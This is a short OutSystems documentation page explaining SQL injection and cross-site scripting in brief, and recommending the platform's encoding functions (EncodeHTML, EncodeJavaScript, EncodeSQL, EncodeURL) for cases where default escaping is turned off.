Skip to main content

Protecting OutSystems apps from code injection / Cross Site Scripting attacks

Code Injection

Code injection is all about sending untrusted data into a code interpreter. The most common scenarios are SQL Injection and XML Injection.

The following example from OWASP documentation illustrates how an SQL injection attack can be used to fetch all accounts from a database:

Cross Site Scripting

Cross Site Scripting (XSS) occurs when there is an attempt of sending untrusted data into the web browser (renderer). It is one of the most common web application vulnerabilities.

The following example from OWASP documentation illustrates how an XSS attack can be used to hijack a user session and impersonate him:

How to do it with OutSystems Platform

In general, the recommended strategy is to escape content.

When you need to explicitly turn off the default content escaping feature of OutSystems Platform, the corresponding actions are recommended:

Use case Actions

Escape expressions in screens

Use functions EncodeHTML() or EncodeJavaScript()

Expand inline parameters in advanced queries

Use function EncodeSQL()

Manually build URLs in redirects with dynamic URLs

Use function EncodeURL()

More information

To learn how to protect your OutSystems apps against other common types of attacks, check how OutSystems Platfom helps you develop secure applications.